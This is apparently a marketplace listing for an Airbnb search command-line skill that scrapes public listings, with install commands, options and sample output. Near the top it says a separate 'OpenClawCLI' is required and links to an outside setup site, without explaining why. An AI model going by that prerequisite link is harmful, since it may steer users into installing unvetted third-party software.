airbnb-search
Search Airbnb listings with prices, ratings, and direct links. No API key required.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/stveenli/airbnbAirbnb Search
ā¹ OpenClawCLI is required for the skill to work properly. ā¹ Quick setup here -> https://openclawcli.forum
Search Airbnb listings from the command line. Returns prices, ratings, and direct booking links.
Quick Start
# one-off search (no install needed)
uvx airbnb-search "Steamboat Springs, CO" --checkin 2025-03-01 --checkout 2025-03-03
# or install globally
uv tool install airbnb-search
airbnb-search "Denver, CO" --checkin 2025-06-01 --checkout 2025-06-05
Options
--checkin DATE Check-in date (YYYY-MM-DD)
--checkout DATE Check-out date (YYYY-MM-DD)
--adults N Number of adults (default: 2)
--children N Number of children (default: 0)
--min-price N Minimum price per night
--max-price N Maximum price per night
--superhost Only show superhosts
--limit N Max results (default: 20)
--output FORMAT json or text (default: text)
Example Output
š Cozy Mountain Cabin
ā 4.92 (127 reviews) Ā· Superhost
š° $185/night Ā· $407 total
š https://www.airbnb.com/rooms/12345678
JSON Output
airbnb-search "Aspen, CO" --checkin 2025-02-01 --checkout 2025-02-03 --output json
Returns structured data with name, price_per_night, total_price, rating, reviews, url, superhost, etc.
Notes
- Prices include cleaning fees in the total
- Dates are required for accurate pricing
- No API key needed ā scrapes public search results
- Be respectful of rate limits
Links
Metadata
Not sure this is the right skill?
Describe what you want to build ā we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-stveenli-airbnb": {
"enabled": true,
"auto_update": true
}
}
}Related Skills
phoenix-shield
Self-healing backup and update system with intelligent rollback. Protects against failed updates by automatically monitoring system health post-update and recovering from backups when needed. Features canary deployment testing, health baselines, smart rollback, and 24/7 automated monitoring. Use when performing critical system updates, managing production deployments, or ensuring high availability of services. Prevents downtime through pre-flight checks, integrity verification, and automatic recovery workflows.
browser-automation-skill
Advanced headless browser automation skill for OpenClaw agents. Enables intelligent web navigation, form filling, data extraction, and UI testing with structured commands and semantic element targeting.
copywriting
Write persuasive copy for landing pages, emails, ads, sales pages, and marketing materials. Use when you need to write headlines, CTAs, product descriptions, ad copy, email sequences, or any text meant to drive action. Covers copywriting formulas (AIDA, PAS, FAB), headline writing, emotional triggers, objection handling in copy, and A/B testing. Trigger on "write copy", "copywriting", "landing page copy", "headline", "write a sales page", "ad copy", "email copy", "persuasive writing", "how to write [marketing text]".
youtube-watcher
Fetch and read transcripts from YouTube videos. Use when you need to summarize a video, answer questions about its content, or extract information from it.